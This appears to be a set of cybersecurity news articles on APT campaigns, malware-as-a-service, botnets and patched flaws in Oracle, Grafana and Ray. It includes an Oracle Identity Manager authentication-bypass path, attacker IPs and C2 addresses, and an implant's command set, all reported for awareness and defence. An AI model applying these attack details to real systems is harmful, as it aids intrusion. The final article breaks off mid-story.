2025-11-24 AI创业新闻
China-Linked APT31 Launches Stealthy Cyberattacks on Russian IT Using Cloud Services
The China-linked advanced persistent threat (APT) group known as APT31 has been attributed to cyber attacks targeting the Russian information technology (IT) sector between 2024 and 2025 while staying undetected for extended periods of time. “In the period from 2024 to 2025, the Russian IT sector, especially companies working as contractors and integrators of solutions for government agencies, faced a series of targeted computer attacks,” Positive Technologies researchers Daniil Grigoryan and Varvara Koloskova said in a technical report. APT31, also known as Altaire, Bronze Vinewood, Judgement Panda, PerplexedGoblin, RedBravo, Red Keres, and Violet Typhoon (formerly Zirconium), is assessed to be active since at least 2010. It has a track record of striking a wide range of sectors, including governments, financial, and aerospace and defense, high tech, construction and engineering, telecommunications, media, and insurance.
The cyber espionage group is primarily focused on gathering intelligence that can provide Beijing and state-owned enterprises with political, economic, and military advantages. In May 2025, the hacking crew was blamed by the Czech Republic for targeting its Ministry of Foreign Affairs. The attacks aimed at Russia are characterized by the use of legitimate cloud services, mainly those prevalent in the country, like Yandex Cloud, for command-and-control (C2) and data exfiltration in an attempt to blend in with normal traffic and escape detection. The adversary is also said to have staged encrypted commands and payloads in social media profiles, both domestic and foreign, while also conducting their attacks during weekends and holidays.
In at least one attack targeting an IT company, APT31 breached its network as far back as late 2022, before escalating the activity coinciding with the 2023 New Year holidays. In another intrusion detected in December 2024, the threat actors sent a spear-phishing email containing a RAR archive that, in turn, included a Windows Shortcut (LNK) responsible for launching a Cobalt Strike loader dubbed CloudyLoader via DLL side-loading. Details of this activity were previously documented by Kaspersky in July 2025, while identifying some overlaps with a threat cluster known as EastWind . The Russian cybersecurity company also said it identified a ZIP archive lure that masqueraded as a report from the Ministry of Foreign Affairs of Peru to ultimately deploy CloudyLoader.
To facilitate subsequent stages of the attack cycle, APT31 has leveraged an extensive set of publicly available and custom tools. Persistence is achieved by setting up scheduled tasks that mimic legitimate applications, such as Yandex Disk and Google Chrome. Some of them are listed below - SharpADUserIP , a C# utility for reconnaissance and discovery SharpChrome.exe , to extract passwords and cookies from Google Chrome and Microsoft Edge browsers SharpDir , to search files StickyNotesExtract.exe , to extract data from the Windows Sticky Notes database Tailscale VPN, to create an encrypted tunnel and set up a peer-to-peer (P2P) network between the compromised host and their infrastructure Microsoft dev tunnels , to tunnel traffic Owawa , a malicious IIS module for credential theft AufTime, a Linux backdoor that uses the wolfSSL library to communicate with C2 COFFProxy, a Golang backdoor that supports commands for tunneling traffic, executing commands, managing files, and delivering additional payloads VtChatter, a tool that uses Base64-encoded comments to a text file hosted on VirusTotal as a two-way C2 channel every two hours OneDriveDoor, a backdoor that uses Microsoft OneDrive as C2 LocalPlugX , a variant of PlugX that’s used to spread within the local network, rather than to communicate with C2 CloudSorcerer , a backdoor that used cloud services as C2 YaLeak, a .NET tool to upload information to Yandex Cloud “APT31 is constantly replenishing its arsenal: although they continue to use some of their old tools,” Positive Technologies said. “As C2, attackers actively use cloud services, in particular, Yandex and Microsoft OneDrive services.
Many tools are also configured to work in server mode, waiting for attackers to connect to an infected host.” “In addition, the grouping exfiltrates data through Yandex’s cloud storage. These tools and techniques allowed APT31 to stay unnoticed in the infrastructure of victims for years. At the same time, attackers downloaded files and collected confidential information from devices, including passwords from mailboxes and internal services of victims.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
Matrix Push C2 Uses Browser Notifications for Fileless, Cross-Platform Phishing Attacks
Bad actors are leveraging browser notifications as a vector for phishing attacks to distribute malicious links by means of a new command-and-control (C2) platform called Matrix Push C2. “This browser-native, fileless framework leverages push notifications, fake alerts, and link redirects to target victims across operating systems,” Blackfog researcher Brenda Robb said in a Thursday report. In these attacks, prospective targets are tricked into allowing browser notifications through social engineering on malicious or legitimate-but-compromised websites. Once a user agrees to receive notifications from the site, the attackers take advantage of the web push notification mechanism built into the web browser to send alerts that look like they have been sent by the operating system or the browser itself, leveraging trusted branding, familiar logos, and convincing language to maintain the ruse.
These include alerts about, say, suspicious logins or browser updates, along with a handy “Verify” or “Update” button that, when clicked, takes the victim to a bogus site. What makes this a clever technique is that the entire process takes place through the browser without the need for first infecting the victim’s system through some other means. In a way, the attack is like ClickFix in that users are lured into following certain instructions to compromise their own systems, thereby effectively bypassing traditional security controls. That’s not all.
Since the attack plays out via the web browser, it’s also a cross-platform threat. This essentially turns any browser application on any platform that subscribes to the malicious notifications to be enlisted to the pool of clients, giving adversaries a persistent communication channel. Matrix Push C2 is offered as a malware-as-a-service (MaaS) kit to other threat actors. It’s sold directly through crimeware channels, typically via Telegram and cybercrime forums, under a tiered subscription model: about $150 for one month, $405 for three months, $765 for six months, and $1,500 for a full year.
“Payments are accepted in cryptocurrency, and buyers communicate directly with the operator for access,” Dr. Darren Williams, founder and CEO of BlackFog, told The Hacker News. “Matrix Push was first observed at the beginning of October and has been active since then. There’s no evidence of older versions, earlier branding, or long-standing infrastructure.
Everything indicates this is a newly launched kit.” The tool is accessible as a web-based dashboard, allowing users to send notifications, track each victim in real-time, determine which notifications the victims interacted with, create shortened links using a built-in URL shortening service, and even record installed browser extensions, including cryptocurrency wallets. “The core of the attack is social engineering, and Matrix Push C2 comes loaded with configurable templates to maximize the credibility of its fake messages,” Robb explained. “Attackers can easily theme their phishing notifications and landing pages to impersonate well-known companies and services.” Some of the supported notification verification templates are associated with well-known brands like MetaMask, Netflix, Cloudflare, PayPal, and TikTok. The platform also includes an “Analytics & Reports” section that allows its customers to measure the effectiveness of their campaigns and refine them as required.
“Matrix Push C2 shows us a shift in how attackers gain initial access and attempt to exploit users,” BlackFog said. “Once a user’s endpoint (computer or mobile device) is under this kind of influence, the attacker can gradually escalate the attack.” “They might deliver additional phishing messages to steal credentials, trick the user into installing a more persistent malware, or even leverage browser exploits to get deeper control of the system. Ultimately, the end goal is often to steal data or monetize the access, for example, by draining cryptocurrency wallets or exfiltrating personal information.” Attacks Misusing Velociraptor on the Rise The development comes as Huntress said it observed a “significant uptick” in attacks weaponizing the legitimate Velociraptor digital forensics and incident response (DFIR) tool over the past three months. On November 12, 2025, the cybersecurity vendor said threat actors deployed Velociraptor after obtaining initial access through exploitation of a flaw in Windows Server Update Services ( CVE-2025-59287 , CVSS score: 9.8), which was patched by Microsoft late last month.
Subsequently, the attackers are said to have launched discovery queries with the goal of conducting reconnaissance and gathering details about users, running services, and configurations. The attack was contained before it could progress further, Huntress added. The discovery shows that threat actors are not just using custom C2 frameworks , but are also employing readily available offensive cybersecurity and incident response tools to their advantage. “We’ve seen threat actors use legitimate tools long enough to know that Velociraptor won’t be the first dual-use, open-source tool that will pop up in attacks – nor will it be the last,” Huntress researchers said.
Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
CISA Warns of Actively Exploited Critical Oracle Identity Manager Zero-Day Vulnerability
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Friday added a critical security flaw impacting Oracle Identity Manager to its Known Exploited Vulnerabilities ( KEV ) catalog, citing evidence of active exploitation. The vulnerability in question is CVE-2025-61757 (CVSS score: 9.8), a case of missing authentication for a critical function that can result in pre-authenticated remote code execution. The vulnerability affects versions 12.2.1.4.0 and 14.1.2.1.0.
It was addressed by Oracle as part of its quarterly updates released last month. “Oracle Fusion Middleware contains a missing authentication for a critical function vulnerability, allowing unauthenticated remote attackers to take over Identity Manager,” CISA said. Searchlight Cyber researchers Adam Kues and Shubham Shah, who discovered the flaw, said it can permit an attacker to access API endpoints that, in turn, can allow them “to manipulate authentication flows, escalate privileges, and move laterally across an organization’s core systems.” Specifically, it stems from a bypass of a security filter that tricks protected endpoints into being treated as publicly accessible by simply adding “?WSDL” or “;.wadl” to any URI. This, in turn, is the result of a faulty allow-list mechanism based on regular expressions or string matching against the request URI.
“This system is very error-prone, and there are typically ways to trick these filters into thinking we’re accessing an unauthenticated route when we’re not,” the researchers noted. The authentication bypass can then be paired with a request to the “/iam/governance/applicationmanagement/api/v1/applications/groovyscriptstatus” endpoint to achieve remote code execution by sending a specially crafted HTTP POST. While the endpoint is only meant for checking the syntax of Groovy code and not executing it, Searchlight Cyber said it was able to “write a Groovy annotation that executes at compile time, even though the compiled code is not actually run.” The addition of CVE-2025-61757 to the KEV catalog comes days after Johannes B. Ullrich, the dean of research at the SANS Technology Institute, said an analysis of honeypot logs revealed several attempts to access the URL “/iam/governance/applicationmanagement/api/v1/applications/groovyscriptstatus;.wadl” via HTTP POST requests between August 30 and September 9, 2025.
“There are several different IP addresses scanning for it, but they all use the same user agent, which suggests that we may be dealing with a single attacker,” Ullrich said . “Sadly, we did not capture the bodies for these requests, but they were all POST requests. The content-length header indicated a 556-byte payload.” This indicates that the vulnerability may have been exploited as a zero-day vulnerability, well before a patch was shipped by Oracle. The IP addresses from which the attempts originated are listed below - 89.238.132[.]76 185.245.82[.]81 138.199.29[.]153 In light of active exploitation, Federal Civilian Executive Branch (FCEB) agencies are required to apply the necessary patches by December 12, 2025, to secure their networks.
Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
Grafana Patches CVSS 10.0 SCIM Flaw Enabling Impersonation and Privilege Escalation
Grafana has released security updates to address a maximum severity security flaw that could allow privilege escalation or user impersonation under certain configurations. The vulnerability, tracked as CVE-2025-41115 , carries a CVSS score of 10.0. It resides in the System for Cross-domain Identity Management ( SCIM ) component that allows automated user provisioning and management. First introduced in April 2025, it’s currently in public preview.
“In Grafana versions 12.x where SCIM provisioning is enabled and configured, a vulnerability in user identity handling allows a malicious or compromised SCIM client to provision a user with a numeric externalId, which in turn could allow for overriding internal user IDs and lead to impersonation or privilege escalation,” Grafana’s Vardan Torosyan said . That said, successful exploitation hinges on both conditions being met - enableSCIM feature flag is set to true user_sync_enabled config option in the [auth.scim] block is set to true The shortcoming affects Grafana Enterprise versions from 12.0.0 to 12.2.1. It has been addressed in the following versions of the software - Grafana Enterprise 12.0.6+security-01 Grafana Enterprise 12.1.3+security-01 Grafana Enterprise 12.2.1+security-01 Grafana Enterprise 12.3.0 “Grafana maps the SCIM externalId directly to the internal user.uid; therefore, numeric values (e.g. ‘1’) may be interpreted as internal numeric user IDs,” Torosyan said.
“In specific cases this could allow the newly provisioned user to be treated as an existing internal account, such as the Admin, leading to potential impersonation or privilege escalation.” The analytics and observability platform said the vulnerability was discovered internally on November 4, 2025, during an audit and testing. Given the severity of the issue, users are advised to apply the patches as soon as possible to mitigate potential risks. Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
Google Brings AirDrop Compatibility to Android’s Quick Share Using Rust-Hardened Security
In a surprise move, Google on Thursday announced that it has updated Quick Share, its peer-to-peer file transfer service, to work with Apple’s equipment AirDrop, allowing users to more easily share files and photos between Android and iPhone devices. The cross-platform sharing feature is currently limited to the Pixel 10 lineup and works with iPhone, iPad, and macOS devices, with plans to expand to additional Android devices in the future. In order to transfer a file from a Pixel 10 phone over AirDrop, the only caveat is that the owner of the Apple device is required to make sure their iPhone (or iPad or Mac) is discoverable to anyone – which can be enabled for 10 minutes. Likewise, to receive content from an Apple device, Android device users will need to adjust their Quick Share visibility settings to Everyone for 10 minutes or be in Receive mode on the Quick Share page, according to a support document published by Google.
“We built Quick Share’s interoperability support for AirDrop with the same rigorous security standards that we apply to all Google products,” Dave Kleidermacher, vice president of Platforms Security and Privacy at Google, said . At the heart of the future is a multi-layered security approach that’s powered by the memory-safe Rust programming language to create a secure sharing channel that Google said eliminates entire classes of memory safety vulnerabilities, making its implementation resilient against attacks that attempt to exploit memory errors. The tech giant also noted that the feature does not rely on any workaround and that the data is not routed through a server, adding it’s open to working with Apple to enable “Contacts Only” mode in the future. “Google’s implementation of its version of Quick Share does not introduce vulnerabilities into the broader protocol’s ecosystem,” NetSPI, which carried out an independent assessment in August 2025, said.
“While it shares specific characteristics with implementations made by other manufacturers, this implementation is reasonably more secure. In fact, the process of file exchange is notably stronger, as it doesn’t leak any information, which is a common weakness in other manufacturers’ implementations.” That said, its analysis uncovered a low-severity information disclosure vulnerability (CVSS score: 2.1) that could permit an attacker with physical access to the device to access information, such as image thumbnails and SHA256 hashes of phone numbers and email addresses. It has since been addressed by Google. The development comes as Google said it blocked in India more than 115 million attempts to install sideloaded apps that request access to sensitive permissions for financial fraud.
The company also said it’s piloting a new feature in the country in collaboration with financial services like Google Pay, Navi, and Paytm to combat scams that trick users into opening the apps when sharing their screens. “Devices running Android 11+ now show a prominent alert if a user opens one of these apps while screen sharing on a call with an unknown contact,” Evan Kotsovinos, vice president of privacy, safety, and security at Google, said . “This feature provides a one-tap option to end the call and stop screen sharing, protecting users from potential fraud. Lastly, Google said it’s also developing Enhanced Phone Number Verification (ePNV), which it described as a new Android-based security protocol that replaces SMS OTP flows with SIM-based verification to improve sign-in security.
Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
Why IT Admins Choose Samsung for Mobile Security
Ever wonder how some IT teams keep corporate data safe without slowing down employees? Of course you have. Mobile devices are essential for modern work—but with mobility comes risk. IT admins, like you, juggle protecting sensitive data while keeping teams productive.
That’s why more enterprises are turning to Samsung for mobile security. Hey—you’re busy, so here’s a quick-read article on what makes Samsung Galaxy devices and Knox Suite really stand out. Security built in. Management simplified.
Samsung Galaxy devices come with Samsung Knox built in at the manufacturing stage, creating a hardware foundation that extends visibility and control across your security infrastructure. Simplified management with Knox Suite: Samsung’s all-in-one package to manage and secure work devices grants centralized control without the need for extra tools or workflows (that got your attention!). Integrated security: Samsung Knox is built into both hardware and software, giving multi-layered protection against malware attacks. Government-grade protection: Secure boot, trusted execution environments, and more—that means these devices are ready for enterprise demands!
With Samsung Galaxy, security isn’t just software—it’s the foundation of your devices. Strengthening Zero Trust without the hassle Mobile threats can appear anywhere. To mitigate the risks, Samsung Galaxy devices are Zero Trust ready, while Samsung Knox enforces strict access controls within your systems. Let’s take a quick look: Device Integrity: Samsung Galaxy devices, managed or unmanaged, verify their integrity before connecting to corporate resources.
See how. Zero Trust Network Access (ZTNA): Businesses can get high-speed Zero Trust Network Access natively from Samsung Galaxy devices. Real-time security signals: Knox Asset Intelligence (part of Knox Suite - Enterprise Plan) sends almost-real-time device telemetry into security information and event management (SIEM) tools, so mobile threats appear alongside other alerts. Check out Samsung’s article on Knox Asset Intelligence for Microsoft Sentinel!
Think of it as a live dashboard for every device without adding extra complexity. Samsung Knox helps you stay strict without making life harder for your team—that’s a win-win! Extending your EMM strategy… without adding headaches Knox Suite amplifies the EMM tools you already use, further strengthening your enterprise mobility management.
IT admins get deeper security, smarter insights, and tighter control while keeping existing workflows intact. What’s more, it’s compatible with most EMM tools! With Knox Suite, you can: Equip your frontline with the tools they need to succeed. Leverage powerful features such as Knox Authentication Manager for seamless, secure access.
And, ensure operational continuity of your Line of Business apps by enforcing OS compatibility through Knox E-FOTA. Gain unmatched control and security over your organization’s devices with Knox Mobile Enrollment, which allows you to securely lock devices to your organization–even after a factory reset–until released by an admin. Stay ahead of threats with the Knox Asset Intelligence security center dashboard, which provides a comprehensive look at your entire Samsung fleet, highlighting vulnerabilities and patch levels for unique chipsets. In short, Knox Suite enhances the value of your EMM tools—providing IT with enterprise-grade security and visibility without slowing day-to-day operations.
Why Samsung is a trusted partner for IT admins Here’s the deal: Samsung’s Knox Suite helps to manage and secure work devices for today’s challenges and tomorrow’s threats. Protect sensitive data: Layered hardware and software defences keep corporate information safe. Maintain productivity: Users stay productive while IT remains in control. Future-ready: Knox evolves alongside security threats, policies, and enterprise needs.
Security doesn’t have to be complicated—it just needs the right foundation. By choosing Samsung, enterprises can confidently embrace mobility while safeguarding their most valuable assets: data and reputation. Want to be the IT hero who brought security and productivity to your team? Here’s all you need to know!
Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
APT24 Deploys BADAUDIO in Years-Long Espionage Hitting Taiwan and 1,000+ Domains
A China-nexus threat actor known as APT24 has been observed using a previously undocumented malware dubbed BADAUDIO to establish persistent remote access to compromised networks as part of a nearly three-year campaign. “While earlier operations relied on broad strategic web compromises to compromise legitimate websites, APT24 has recently pivoted to using more sophisticated vectors targeting organizations in Taiwan,” Google Threat Intelligence Group (GTIG) researchers Harsh Parashar, Tierra Duncan, and Dan Perez said . “This includes the repeated compromise of a regional digital marketing firm to execute supply chain attacks and the use of targeted phishing campaigns.” APT24, also called Pitty Tiger, is the moniker assigned to a suspected Chinese hacking group that has targeted government, healthcare, construction and engineering, mining, non-profit, and telecommunications sectors in the U.S. and Taiwan.
The group is also known to engage in cyber operations where the goal is intellectual property theft, specifically focusing on information that makes organizations competitive within their fields, per Google. According to a July 2014 report from FireEye, the adversary is believed to be active as early as 2008, with the attacks leveraging phishing emails to trick recipients into opening Microsoft Office documents that, in turn, exploit known security flaws in the software (e.g., CVE-2012-0158 and CVE-2014-1761 ) to infect systems with malware. Some of the malware families associated with APT24 include CT RAT, a variant of Enfal/Lurid Downloader called MM RAT (aka Goldsun-B), and variants of Gh0st RAT known as Paladin RAT and Leo RAT. Another notable malware put to use by the threat actor is a backdoor named Taidoor (aka Roudan).
APT24 is assessed to be closely related to another advanced persistent threat (APT) group called Earth Aughisky, which has also deployed Taidoor in its campaigns and has leveraged infrastructure previously attributed to APT24 as part of attacks distributing another backdoor referred to as Specas. Both the malware strains, per an October 2022 report from Trend Micro, are designed to read proxy settings from a specific file “%systemroot%\system32\sprxx.dll.” The latest findings from GTIG show that the BADAUDIO campaign has been underway since November 2022, with the attackers using watering holes, supply chain compromises, and spear-phishing as initial access vectors. A highly obfuscated malware written in C++, BADAUDIO uses control flow flattening to resist reverse engineering and acts as a first-stage downloader that’s capable of downloading, decrypting, and executing an AES-encrypted payload from a hard-coded command and control (C2) server. It works by gathering and exfiltrating basic system information to the server, which responds with the payload to be run on the host.
In one case, it was a Cobalt Strike Beacon. BADAUDIO campaign overview “BADAUDIO typically manifests as a malicious Dynamic Link Library (DLL) leveraging DLL Search Order Hijacking (MITRE ATT&CK T1574.001) for execution via legitimate applications,” GTIG said. “Recent variants observed indicate a refined execution chain: encrypted archives containing BADAUDIO DLLs along with VBS, BAT, and LNK files.” From November 2022 to at least early September 2025, APT24 is estimated to have compromised more than 20 legitimate websites to inject malicious JavaScript code to specifically exclude visitors coming from macOS, iOS, and Android, generate a unique browser fingerprint using the FingerprintJS library, and serve them a fake pop-up urging them to download BADAUDIO under the guise of a Google Chrome update. Then, starting in July 2024, the hacking group breached a regional digital marketing firm in Taiwan to orchestrate a supply chain attack by injecting the malicious JavaScript into a widely used JavaScript library that the company distributed, effectively allowing it to hijack more than 1,000 domains.
The modified third-party script is configured to reach out to a typosquatted domain impersonating a legitimate Content Delivery Network (CDN) and fetch the attacker-controlled JavaScript to fingerprint the machine and then serve the pop-up to download BADAUDIO after validation. “The compromise in June 2025 initially employed conditional script loading based on a unique web ID (the specific domain name) related to the website using the compromised third-party scripts,” Google said. “This suggests tailored targeting, limiting the strategic web compromise (MITRE ATT&CK T1189) to a single domain.” Compromised JS supply chain attack to deliver BADAUDIO malware “However, for a ten-day period in August, the conditions were temporarily lifted, allowing all 1,000 domains using the scripts to be compromised before the original restriction was reimposed.” APT24 has also been observed conducting targeted phishing attacks since August 2024, using lures related to an animal rescue organization to trick recipients into responding and ultimately deliver BADAUDIO via encrypted archives hosted on Google Drive and Microsoft OneDrive. These messages come fitted with tracking pixels to confirm whether the emails were opened by the targets and tailor their efforts accordingly.
“The use of advanced techniques like supply chain compromise, multi-layered social engineering, and the abuse of legitimate cloud services demonstrates the actor’s capacity for persistent and adaptive espionage,” Google said. China-Nexus APT Group Targets Southeast Asia The disclosure comes as CyberArmor detailed a sustained espionage campaign orchestrated by a suspected China-nexus threat actor against government, media, and news sectors in Laos, Cambodia, Singapore, the Philippines, and Indonesia. The activity has been codenamed Autumn Dragon . The attack chain commences with a RAR archive likely sent as an attachment in spear-phishing messages that, when extracted, exploits a WinRAR security flaw ( CVE-2025-8088 , CVSS score: 8.8) to launch a batch script (“Windows Defender Definition Update.cmd”) that sets up persistence to ensure that the malware is launched automatically when the user logs in to the system the next time.
It also downloads a second RAR archive hosted on Dropbox via PowerShell. The RAR archive contains two files, a legitimate executable (“obs-browser-page.exe”) and a malicious DLL (“libcef.dll”). The batch script then runs the binary to sideload the DLL, which then communicates with the threat actor over Telegram to fetch commands (“shell”), capture screenshots (“screenshot”), and drop additional payloads (“upload”). “The bot controller (threat actor) uses these three commands to gather information and perform reconnaissance of the victim’s computer and deploy third-stage malware,” security researchers Nguyen Nguyen and BartBlaze said.
“This design enables the controller to remain stealthy and evade detection.” The third stage once again involves the use of DLL side-loading to launch a rogue DLL (“CRClient.dll”) by using a real binary (“Creative Cloud Helper.exe”), which then decrypts and runs shellcode responsible for loading and executing the final payload, a lightweight implant written in C++ that can communicate with a remote server (“public.megadatacloud[.]com”) and supports eight different commands - 65, to run a specified command using “cmd.exe,” gather the result, and exfiltrate it back to the C2 server 66, to load and execute a DLL 67, to execute shellcode 68, to update configuration 70, to read a file supplied by the operator 71, to open a file and write the content supplied by the operator 72, to get/set the current directory 73, to sleep for a random interval and terminate itself While the activity has not been tied to a specific threat actor or group, it’s possibly the work of a China-nexus group possessing intermediate operational capabilities. This assessment is based on the adversary’s continued targeting of countries surrounding the South China Sea . “The attack campaign is targeted,” the researchers said. “Throughout our analysis, we frequently observed the next stages being hosted behind Cloudflare, with geo-restrictions enabled, as well as other restrictions such as only allowing specific HTTP User Agents.” Found this article interesting?
Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
SEC Drops SolarWinds Case After Years of High-Stakes Cybersecurity Scrutiny
The U.S. Securities and Exchange Commission (SEC) has abandoned its lawsuit against SolarWinds and its chief information security officer, alleging that the company had misled investors about the security practices that led to the 2020 supply chain attack. In a joint motion filed November 20, 2025, the SEC, along with SolarWinds and its CISO Timothy G. Brown, asked the court to voluntarily dismiss the case.
The SEC said its decision to seek dismissal “does not necessarily reflect the Commission’s position on any other case.” SolarWinds and Brown were accused by the SEC in October 2023 of “fraud and internal control failures” and that the company defrauded investors by overstating its cybersecurity practices and understating or failing to disclose known risks. The agency also said both SolarWinds and Brown ignored “repeated red flags” and failed to adequately protect its assets, ultimately leading to the supply chain compromise that came to light in late 2020. The attack was attributed to a Russian state-sponsored threat actor known as APT29. “Brown was aware of SolarWinds’ cybersecurity risks and vulnerabilities but failed to resolve the issues or, at times, sufficiently raise them further within the company,” the SEC alleged at the time.
However, in July 2024, many of these allegations were thrown out by the U.S. District Court for the Southern District of New York (SDNY), stating “these do not plausibly plead actionable deficiencies in the company’s reporting of the cybersecurity hack” and that they “impermissibly rely on hindsight and speculation.” Subsequently, the SEC also charged Avaya, Check Point, Mimecast, and Unisys for making “materially misleading disclosures” related to the large-scale cyber attack that stemmed from the SolarWinds hack. In a statement, SolarWinds CEO Sudhakar Ramakrishna said the latest development marks the end of an era that challenged the company, and emphasized “we emerge stronger, more secure, and better prepared than ever for what lies ahead.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
Salesforce Flags Unauthorized Data Access via Gainsight-Linked OAuth Activity
Salesforce has warned of detected “unusual activity” related to Gainsight-published applications connected to the platform. “Our investigation indicates this activity may have enabled unauthorized access to certain customers’ Salesforce data through the app’s connection,” the company said in an advisory. The cloud services firm said it has taken the step of revoking all active access and refresh tokens associated with Gainsight-published applications connected to Salesforce. It has also temporarily removed those applications from the AppExchange as its investigation continues.
Salesforce did not disclose how many customers were impacted by the incident, but said it has notified them. “There is no indication that this issue resulted from any vulnerability in the Salesforce platform,” the company added. “The activity appears to be related to the app’s external connection to Salesforce.” Out of an abundance of caution, the Gainsight app has been temporarily pulled from the HubSpot Marketplace and Zendesk connector access has been revoked. “This may also impact Oauth access for customer connections while the review is taking place,” Gainsight said.
“No suspicious activity related to Hubspot has been observed at this point.” In a post shared on LinkedIn, Austin Larsen, principal threat analyst at Google Threat Intelligence Group (GTIG), described it as an “emerging campaign” targeting Gainsight-published applications connected to Salesforce by compromising third-party OAuth tokens to potentially gain unauthorized access. The activity is assessed to be tied to threat actors associated with the ShinyHunters (aka UNC6240) group, mirroring a similar set of attacks targeting Salesloft Drift instances earlier this August. According to DataBreaches.Net, ShinyHunters has confirmed the campaign is their doing and stated that the Salesloft and Gainsight attack waves allowed them to steal data from nearly 1000 organizations. Interestingly, Gainsight previously said it was also one of the Salesloft Drift customers impacted in the previous attack.
But it’s not clear at this stage if the earlier breach played a role in the current incident. In that hack, the attackers accessed business contact details for Salesforce-related content, including names, business email addresses, phone numbers, regional/location details, product licensing information, and support case contents (without attachments). “Adversaries are increasingly targeting the OAuth tokens of trusted third-party SaaS integrations,” Larsen pointed out . In light of the malicious activity, organizations are advised to review all third-party applications connected to Salesforce, revoke tokens for unused or suspicious applications, and rotate credentials if anomalies are flagged from an integration.
Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
ShadowRay 2.0 Exploits Unpatched Ray Flaw to Build Self-Spreading GPU Cryptomining Botnet
Oligo Security has warned of ongoing attacks exploiting a two-year-old security flaw in the Ray open-source artificial intelligence (AI) framework to turn infected clusters with NVIDIA GPUs into a self-replicating cryptocurrency mining botnet. The activity, codenamed ShadowRay 2.0 , is an evolution of a prior wave that was observed between September 2023 and March 2024. The attack, at its core, exploits a critical missing authentication bug (CVE-2023-48022, CVSS score: 9.8) to take control of susceptible instances and hijack their computing power for illicit cryptocurrency mining using XMRig. The vulnerability has remained unpatched due to a “ long-standing design decision “ that’s consistent with Ray’s development best practices, which requires it to be run in an isolated network and act upon trusted code.
The campaign involves submitting malicious jobs, with commands ranging from simple reconnaissance to complex multi-stage Bash and Python payloads, to an unauthenticated Ray Job Submission API (“/api/jobs/”) on exposed dashboards. The compromised Ray clusters are then used in spray and pray attacks to distribute the payloads to other Ray dashboards, creating a worm that can essentially spread from one victim to another. The attacks have been found to leverage GitLab and GitHub to deliver the malware, using names like “ironern440-group” and “thisisforwork440-ops” to create repositories and stash the malicious payloads. Both accounts are no longer accessible.
However, the cybercriminals have responded to takedown efforts by creating a new GitHub account, illustrating their tenacity and ability to quickly resume operations. The payloads, in turn, leverage the platform’s orchestration capabilities to pivot laterally to non-internet-facing nodes, spread the malware, create reverse shells to attacker-controlled infrastructure for remote control, and establish persistence by running a cron job every 15 minutes that pulls the latest version of the malware from GitLab to re-infect the hosts. The threat actors “have turned Ray’s legitimate orchestration features into tools for a self-propagating, globally cryptojacking operation, spreading autonomously across exposed Ray clusters,” researchers Avi Lumelsky and Gal Elbaz said. The campaign has likely made use of large language models (LLMs) to create the GitLab payloads.
This assessment is based on the malware’s “structure, comments, and error handling patterns.” The infection chain involves an explicit check to determine if the victim is located in China, and if so, serves a region-specific version of the malware. It’s also designed to eliminate competition by scanning running processes for other cryptocurrency miners and terminating them – a tactic widely adopted by cryptojacking groups to maximize the mining gains from the host. Another notable aspect of the attacks is the use of various tactics to fly under the radar, including disguising malicious processes as legitimate Linux kernel worker services and limiting CPU usage to around 60%. It’s believed that the campaign may have been active since September 2024.
While Ray is meant to be deployed within a “controlled network environment,” the findings show that users are exposing Ray servers to the internet, opening a lucrative attack surface for bad actors who can identify which Ray dashboard IP addresses are exploitable using the open-source vulnerability detection tool interact.sh . More than 230,500 Ray servers are publicly accessible. Anyscale, which originally developed Ray, has released a “Ray Open Ports Checker” tool to validate the proper configuration of clusters to prevent accidental exposure. Other mitigation strategies include configuring firewall rules to limit unauthorized access and adding authorization on top of the Ray Dashboard port (8265 by default).
“Attackers deployed sockstress, a TCP state exhaustion tool, targeting production websites. This suggests the compromised Ray clusters are being weaponized for denial-of-service attacks, possibly against competing mining pools or other infrastructure,” Oligo said. “This transforms the operation from pure cryptojacking into a multi-purpose botnet. The ability to launch DDoS attacks adds another monetization vector – attackers can rent out DDoS capacity or use it to eliminate competition.
The target port 3333 is commonly used by mining pools, suggesting attacks against rival mining infrastructure.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
Tsundere Botnet Expands Using Game Lures and Ethereum-Based C2 on Windows
Cybersecurity researchers have warned of an actively expanding botnet dubbed Tsundere that’s targeting Windows users. Active since mid-2025, the threat is designed to execute arbitrary JavaScript code retrieved from a command-and-control (C2) server, Kaspersky researcher Lisandro Ubiedo said in an analysis published today. There are currently no details on how the botnet malware is propagated; however, in at least one case, the threat actors behind the operation are said to have leveraged a legitimate Remote Monitoring and Management (RMM) tool as a conduit to download an MSI installer file from a compromised site. The names given to the malware artifacts – Valorant, r6x (Rainbow Six Siege X), and cs2 (Counter-Strike 2) – also suggest that the implant is likely being disseminated using game-related lures.
It’s possible that users searching for pirated versions of these games are the target. Regardless of the method used, the fake MSI installer is designed to install Node.js and launch a loader script that’s responsible for decrypting and executing the main botnet-related payload. It also prepares the environment by downloading three legitimate libraries, namely, ws, ethers, and pm2, using an “npm install” command. “The pm2 package is installed to ensure the Tsundere bot remains active and used to launch the bot,” Ubiedo explained.
“Additionally, pm2 helps achieve persistence on the system by writing to the registry and configuring itself to restart the process upon login.” Kaspersky’s analysis of the C2 panel has revealed that the malware is also propagated in the form of a PowerShell script, which performs a similar sequence of actions by deploying Node.js on the compromised host and downloading ws and ethers as dependencies. While the PowerShell infector doesn’t make use of pm2, it carries out the same actions observed in the MSI installer by creating a registry key value that ensures the bot is executed on each login by spawning a new instance of itself. The Tsundere botnet makes use of the Ethereum blockchain to fetch details of the WebSocket C2 server (e.g., ws://193.24.123[.]68:3011 or ws://185.28.119[.]179:1234), creating a resilient mechanism that allows the attackers to rotate the infrastructure simply by employing a smart contract . The contract was created on September 23, 2024, and has had 26 transactions to date.
